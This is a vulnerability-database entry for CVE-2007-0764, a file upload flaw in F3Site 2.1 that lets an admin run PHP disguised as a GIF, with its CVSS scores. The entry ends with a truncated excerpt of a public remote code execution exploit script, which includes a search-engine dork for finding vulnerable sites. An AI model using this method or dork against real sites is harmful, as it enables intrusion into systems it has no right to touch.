6.5
CVSSv2

CVE-2007-0764

Published: 06/02/2007 Updated: 19/10/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in F3Site 2.1 and previous versions allows remote authenticated administrators to upload and execute arbitrary PHP scripts via GIF86 header in a file in the uplf parameter, which can be later accessed via a relative pathname in the dir parameter in adm.php.

Vulnerable Product Search on Vulmon Subscribe to Product

f3site f3site 2.1

Exploits

<? //************************************************************** //Kacper & str0ke Settings $exploit_name = "F3Site <= 21 Remote Code Execution Exploit"; $script_name = "F3Site 21"; $script_site = "dhostinfo/compmaster/"; $dork = '"Powered by F3Site"'; //to work exploit you need admin session, and cookies prefix //********** ...